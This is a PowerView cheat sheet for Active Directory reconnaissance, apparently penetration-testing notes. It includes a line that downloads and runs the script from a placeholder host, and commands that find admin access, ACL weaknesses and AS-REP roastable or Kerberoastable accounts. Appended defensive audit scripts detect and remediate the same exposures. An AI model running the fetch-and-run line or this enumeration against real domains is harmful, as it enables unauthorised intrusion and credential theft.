# PowerView

```
IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/PowerView.ps1')
```

```
Import-Module .\PowerView.ps1
```

Either line loads the module into the current PowerShell session. If `Import-Module` fails, the script execution policy has to be changed first.

* Basic information about the **domain**:

```
Get-NetDomain
```

* List of **all users** in the domain:

```
Get-NetUser 
```

The output of these commands can be narrowed with `select` (`Select-Object`). For example,

```
Get-NetUser | select cn
```

Here `cn` is one of the property names shown in the command's output; any number of properties can be selected, separated by commas.

* Specific User

```
Get-NetUser "user"
```

* Enumerate domain groups

```
Get-NetGroup
```

* Information from specific group

```
Get-NetGroup "group name"
```

* Enumerate the computer objects in the domain

```
Get-NetComputer
```

* Scans the computers in the domain to determine whether the current user has local administrative rights on any of them

```
Find-LocalAdminAccess
```

* Checking **logged-on users** on a host with Get-NetSession; `-Verbose` adds more detail.

```
Get-NetSession -ComputerName files04 -Verbose
```

* Listing **SPN** accounts in domain

```
Get-NetUser -SPN | select samaccountname,serviceprincipalname
```

* Enumerates the ACEs (access control entries) on an object; principals are listed by SID (security identifier) in the SecurityIdentifier field, and the object itself by ObjectSID

```
Get-ObjectAcl -Identity <user>
```

* Converting SID/ObjSID to name

```
Convert-SidToName <sid/objsid>
```

* Checking which principals hold the "**GenericAll**" right on a specific group; the SIDs returned can then be resolved with Convert-SidToName

```
Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights 
```
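The defender's side of the same check, as an added example that is not part of the original notes: list every principal holding GenericAll on a group, resolve raw SIDs to names (what Convert-SidToName does), and flag holders that are not on an expected list. It uses the Microsoft ActiveDirectory module's `AD:` drive rather than PowerView, so it assumes RSAT on a domain-joined host; the group name and the default expected list are assumptions.

```powershell
# Added audit example, not part of the original notes: who holds GenericAll on a group?
# Assumes the ActiveDirectory module (RSAT) on a domain-joined host.
Import-Module ActiveDirectory

function Get-GenericAllHolders {
    param(
        [Parameter(Mandatory)] [string] $GroupName,
        # Principals that legitimately hold full control; anything else is reported as unexpected.
        # This default list is an assumption; adjust it to the domain's tiering model.
        [string[]] $Expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )
    $group = Get-ADGroup -Identity $GroupName
    $acl   = Get-Acl -Path ("AD:\" + $group.DistinguishedName)
    $all   = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

    foreach ($ace in $acl.Access) {
        # Keep only Allow ACEs that contain every bit of GenericAll. A plain -eq "GenericAll"
        # (as in the PowerView one-liner) misses ACEs that combine GenericAll with other flags.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.ActiveDirectoryRights -band $all) -ne $all) { continue }

        # Get-Acl normally returns NTAccount names already; translate raw SIDs when it does not.
        $who = $ace.IdentityReference
        if ($who -is [System.Security.Principal.SecurityIdentifier]) {
            try   { $who = $who.Translate([System.Security.Principal.NTAccount]) }
            catch { }   # orphaned SID (deleted principal): report the raw SID string
        }

        [pscustomobject]@{
            Group      = $group.Name
            Principal  = $who.Value
            Rights     = $ace.ActiveDirectoryRights
            Inherited  = $ace.IsInherited
            Unexpected = ($Expected -notcontains $who.Value)
        }
    }
}

# Usage: report only the unexpected holders (the group name is a placeholder).
Get-GenericAllHolders -GroupName 'Domain Admins' |
    Where-Object Unexpected |
    Format-Table -AutoSize
```

Inherited ACEs are reported too, because an unexpected principal with inherited full control is usually a sign that a parent OU's ACL was delegated too broadly; the `Inherited` column tells you where to look for the fix.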

* Find the **shares** in the domain

```
Find-DomainShare
```

* Identifying **AS-REP** roastable accounts

```
Get-DomainUser -PreauthNotRequired -verbose
```

* **Kerberoastable** accounts

```
Get-NetUser -SPN | select serviceprincipalname
```
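An added audit example, not part of the original notes, covering the two queries above (AS-REP roastable and Kerberoastable accounts) from the defender's side: it finds the same accounts with the Microsoft ActiveDirectory module instead of PowerView, reports them with their password age, and provides a dry-run-capable helper to re-enable pre-authentication. It assumes RSAT on a domain-joined host; the account name in the usage line is a placeholder.

```powershell
# Added audit example, not part of the original notes: report roasting exposure and fix it.
# Assumes the ActiveDirectory module (RSAT) on a domain-joined host.
Import-Module ActiveDirectory

function Get-RoastingExposure {
    # userAccountControl bit 0x400000 (4194304) = DONT_REQ_PREAUTH. An AS-REP for such an
    # account can be requested without a password and cracked offline.
    $noPreauth = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' `
                            -Properties PasswordLastSet |
        ForEach-Object {
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                Finding         = 'AS-REP roastable: Kerberos pre-authentication not required'
                PasswordLastSet = $_.PasswordLastSet
                Detail          = ''
            }
        }

    # A user account carrying an SPN: any authenticated user can request a service ticket for
    # it and crack the password offline, so it needs a long random password or a gMSA.
    # krbtgt always has an SPN and is managed separately, so it is skipped here.
    $spnUsers = Get-ADUser -LDAPFilter '(servicePrincipalName=*)' `
                           -Properties ServicePrincipalName, PasswordLastSet |
        Where-Object { $_.SamAccountName -ne 'krbtgt' } |
        ForEach-Object {
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                Finding         = 'Kerberoastable: SPN set on a user account'
                PasswordLastSet = $_.PasswordLastSet
                Detail          = ($_.ServicePrincipalName -join '; ')
            }
        }

    @($noPreauth) + @($spnUsers)
}

function Repair-PreauthSetting {
    # Clears the pre-authentication exemption on one account; -WhatIf gives a dry run.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)] [string] $SamAccountName)
    if ($PSCmdlet.ShouldProcess($SamAccountName, 'Require Kerberos pre-authentication')) {
        Set-ADAccountControl -Identity $SamAccountName -DoesNotRequirePreAuth $false
    }
}

# Usage: oldest passwords first, since those are the cheapest to crack.
Get-RoastingExposure | Sort-Object Finding, PasswordLastSet | Format-Table -AutoSize
# Repair-PreauthSetting -SamAccountName 'svc_example' -WhatIf   # 'svc_example' is a placeholder
```

The SPN finding has no one-line fix: the SPN is usually needed, so the remediation is rotating the account to a long random password (or migrating the service to a group managed service account), which is why the report carries `PasswordLastSet` rather than a repair helper.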
